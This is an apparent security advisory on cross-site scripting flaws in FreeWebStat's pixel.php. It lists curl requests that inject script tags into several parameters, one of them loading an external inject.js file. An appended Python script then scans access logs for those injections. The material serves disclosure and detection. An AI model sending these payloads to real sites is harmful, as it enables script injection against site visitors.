
FreeWebStat Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

curl "http://www.example.com/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)</script>&jsref=<script>alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" \
  -e "http://www.example.com"

curl "http://www.example.com/fws/pixel.php?domain=ush.it&site=aa&jsref=http://www.example.com&jsres=1337&jscolor=red" \
  -e "http://www.example.com/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

curl "http://www.example.com/fws/pixel.php?domain=www.example.com&site=aa&jsref=http://www.example.com&jsres=1337&jscolor=red" \
  -e "http://www.example.com" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

curl "http://www.example.com/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)&jsref=</script><script>alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>" \
  -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" \
  -e "http://www.example.com"


curl 'http://www.example.com/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.example.com/search?q=ppoopp<script language="javascript" src="http://www.example.com/fws/inject.js"></script>&hl=it'
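
A defender-side check for the requests listed above, added here as an example that is not part of the original advisory or of FreeWebStat: it scans access-log lines for pixel.php requests whose domain, site, jsref, jsres or jscolor parameters contain angle brackets, and also checks the Referer and User-Agent that those requests set. The combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Inputs that the requests on this page send to pixel.php.
TRACKED = ("domain", "site", "jsref", "jsres", "jscolor")
# Angle brackets are what turn a stored value into markup when it is displayed.
MARKUP = re.compile(r"[<>]")
# Combined log format (an assumption): request, status, size, Referer, User-Agent.
LINE = re.compile(
    r'"(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3} \S+ '
    r'"((?:[^"\\]|\\.)*)" "((?:[^"\\]|\\.)*)"')


def suspicious_fields(log_line):
    """Return the sorted pixel.php inputs in one log line that contain < or >."""
    match = LINE.search(log_line)
    if not match:
        return []
    target, referer, agent = match.groups()
    url = urlsplit(target)
    if not url.path.endswith("/pixel.php"):
        return []
    # parse_qsl percent-decodes each value once, so %3C is seen as "<".
    hits = {name for name, value in parse_qsl(url.query, keep_blank_values=True)
            if name in TRACKED and MARKUP.search(value)}
    # Headers are logged as sent; decode them once as well before checking.
    if MARKUP.search(unquote(referer)):
        hits.add("referer")
    if MARKUP.search(unquote(agent)):
        hits.add("user-agent")
    return sorted(hits)


# Constructed sample log lines (not taken from a real server).
UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
PRE = '203.0.113.7 - - [01/Jan/2009:00:00:01 +0000] "GET /fws/pixel.php?'
SAMPLE = [
    f'{PRE}domain=%3Cscript%3Ealert(1)%3C/script%3E&site=aa&jsref=http://www.example.com'
    f'&jsres=1337&jscolor=red HTTP/1.1" 200 43 "http://www.example.com" "{UA}"',
    f'{PRE}domain=www.example.com&site=aa&jsref=http://www.example.com&jsres=1337'
    f'&jscolor=red HTTP/1.1" 200 43 "http://www.example.com/search?q=lello&hl=it" "{UA}"',
    f'{PRE}site=&jsres=&jscolor=&jsref=http://www.example.com/search?q=ppoopp%3Cscript%3E'
    f'&hl=it HTTP/1.1" 200 43 "http://www.example.com/search?q=ppoopp%3Cscript%3E" "{UA}"',
]

if __name__ == "__main__":
    print([suspicious_fields(line) for line in SAMPLE])
```

Values are decoded only once, so double-encoded input needs a second pass if the application decodes twice.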







 

Copyright 2009, SecurityFocus